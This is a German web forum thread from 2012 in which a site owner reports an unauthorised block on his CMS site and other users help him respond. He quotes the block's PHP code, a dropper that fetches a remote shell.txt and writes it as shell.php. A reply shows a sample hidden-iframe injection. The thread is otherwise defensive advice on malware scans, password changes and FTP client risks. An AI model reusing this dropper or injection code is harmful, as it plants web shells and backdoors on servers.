Forum : AllgemeinesTitel : Hackerangriff !?© 2004-2012 www.exv2.de
http://www.exv2.de
URL dieser Diskussion
http://www.exv2.de/modules/newbb_plus/viewtopic.php?topic_id=4727&forum=8
|
 Daniel :
| 03.02.2012 18:21 |
 Hallo,
ich habe gerade festgestellt, dass ein neuer Block auf meiner Seite erstellt wurde mit diesem Inhalt :
(Es hat sich kein neuer User registriert)
Code:$linky="http://robbsbouldermusic.com/shell.txt";
$saved="shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
echo 'done';
fclose($from);
In der sqlinject.txt befinden sind knapp 2.000 Einträge von dieser Sorte :
Code:entfernt
Was meint ihr dazu 
[ Geändert von Daniel am 03.02.2012 18:31 ]
[ Geändert von Daniel am 03.02.2012 21:30 ] |
|
|
bama : | 03.02.2012 20:21 |
die Einträge in der sqlinject.txt sind kein Problem, das ist nur eine Art Protokoll, mit welchen Aufrufen versucht wurde, deine Seite zu hacken. Sorgen macht mir der neue Block, das kann nur jemand, der Adminrechte hat.
Hast du das Modul my_errors installiert?
Welches FTP-Programm verwendest du? |
|
|
Daniel : | 03.02.2012 21:31 |
Hallo Hans,
das Modul my-errors hab ich nicht installiert.
Ich benutze Filezilla für FTP |
|
|
bama : | 03.02.2012 21:43 |
Seit längerer Zeit findest du über die Suchmaschienen Beiträge, daß Trojaner mehrere FTP-Programme u.a. auch FileZilla die gespeicherten IP Adressen und Passwörter auslesen können und sich dann Zugang zu den Servern verschaffen und Dateien ändern.
Scanne mal deinen PC nach Malware, bzw. verwende nicht FileZilla, bis die das Problem geändert haben.
Ich arbeite gerade an einer Funktion, damit man leichter ermitteln kann, ob und welche Dateien geändert wurden. |
|
|
Weiti : | 03.02.2012 21:56 |
@ Daniel
Zuerst bitte wie Hans schon gesagt hat und ungefähr auch in dieser Reihenfolge:
- Speichere für spätere Analysen unbedingt die fremden Codes/Links/etc. in einer Textdatei
- Kontrolliere online, ob im Metagenerator in den Header- und Footereinstellungen fremde Einträge vorhanden sind z.B. wie der hier:
Code:<noindex><nofollow><iframe src="http://fremde-domain" width="1" height="1"style="border:0px;"></iframe></nofollow></noindex>
- Scanne dein PC unbedingt nach Viren, Trojaner etc. z.B. Onlinescanner von ESET oder div. Tools von Kaspersky & Co.
- Scanne den kompletten PC mit z.B. Malwarebytes ab
- Kontrolliere ob Adobe Reader, Flash, Java, etc. auf dem aktuellen Stand sind - ansonsten sofort Updates fahren - inkl. Browser und Betriebssystem
- Lösche Filezilla und achte drauf, dass auch die XML-Dateien der Servereinstellungen (liegen im Userprofil-Ordner ab) gelöscht wurden. Die bleiben nach einer Deinstallation dort übrig und da steht alles im Klartext drinnen...
- Anderes FTP-Programm installieren
- Ändere alle FTP- und Datenbank-Passwörter für deine Domains (bei exv2 musst später nur die mainfile anpassen)
- Ändere auch das Zugangspasswort zu Deinen Webmaster-Konten um sicher zu gehen, dass dies nicht auch ausgespäht wurde
Sind nur Ratschläge und eine Empfehlung, wie Du wohl jetzt vorgehen solltest...
[ Geändert von Weiti am 03.02.2012 22:02 ] |
|
|
Daniel : | 03.02.2012 22:07 |
| Danke für eure Ratschläge ! |
|
|
CarpHunter : | 04.02.2012 09:16 |
Bei Filezilla ist es in letzter Zeit oft vorgekommen, das dieses Programm z.b. durch einen Trojaner ausspioniert wird und dadurch die FTP Zugangsdaten die gespeichert worden sind, ausgelesen werden können.
Die Attacken gehen deshalb gegen Filezilla, weil es von sehr vielen Usern verwendet wird.
Daher würde ich Ihnen alternativ erstmal WinSCP empfehlen:
http://all-inkl.com/wichtig/anleitungen/#programme_ftp
Anmerkung der Redaktion:
Filezilla speichert alle Passwörter im Klartext und öffnet damit solchen Manipilationen Tür und Tor. Sehen können Sie dies, wenn Sie im Programm FileZilla Ihre Daten Exportieren und dann anschließend die Datei Filezilla.xml mit einem herkömmlichen Texteditor öffnen.
Mein Fazit:
Filezilla Download und Einsatz NEIN DANKE!!!
Gesehen auf admin-news.de |
|
|
Daniel : | 10.02.2012 20:16 |
Hi, habe gerade zum zweiten Mal das Datenbankpasswort geändert und erhalte jetzt diese Fehlermedlung :
Fatal error: Class 'XoopsBlock' not found in /www/htdocs/w00aa467/index.php on line 65
Das Passwort habe ich mehrfach überprüft in der mainfile.php
Es ist wirklich unfassbar, dass dieser Filezilla die Passwörter nicht verschlüsselt |
|
|
bama : | 10.02.2012 22:56 |
Hi Daniel,
es geht nicht um das Datenbankpasswort, sondern um den FTP-Zugang
übrigens, im neuesten Update vom eXV² ist unter
SysAdmin -> eXV2 Tools
-- Systeminfo/CHMOD
eine neue Funktion: Datei-Liste
Geänderte Dateien suchen
per FTP seht ihr ja, wann dieser Zugriff war, wann Dateien geändert wurden, dann kann man hier ein Datum angeben: von bis und es werden alle Dateien aufgelistet, welche in diesem Zeitraum geändert wurden. Das erleichtert doch dann die Suche.
Und noch etwas, damit bei Filezilla ausgelesen werden kann, muss man entweder auf eine präparierten Homepage gewesen sein, oder man hat einen Troijaner auf seinem PC, als unbedingt auch den eigenen PC checken.
[ Geändert von bama am 10.02.2012 23:06 ] |
|
|
bama : | 11.02.2012 11:04 |
Hi Daniel,
deine Seite läuft wieder, soweit ich bis jetzt gesehen haben, wurde die Seite nicht gehackt.
Nur die mainfile.php war nicht richtig geschrieben. Die Datei war als eine einzige Zeile gespeichert. |
|
| |
Daniel : | 16.02.2012 18:12 |
| Zitat: Daher würde ich Ihnen alternativ erstmal WinSCP empfehlen:
Hallo, WinSCP lädt die Dateien im FTP Modus (no encryption) schrecklich langsam hoch. Ist das eine Einstellungsfrage ? |
|
|
bama : | 17.02.2012 10:11 |
Hi Daniel,
dazu kann ich dir nichts sagen, dazu müsstest du dich an die Programmierer von WinSCP wenden.
Ich selbst habe gute Erfahrungen mit FlashFXP ( http://www.flashfxp.com/ ) gemacht, der kostet zwar ca. 23 ¤, aber das ist eine Lizenz auf Lebenszeit incl. alle Updates |
|
|
|
Home
News
Archiv
Forum
Hackerangriff !?
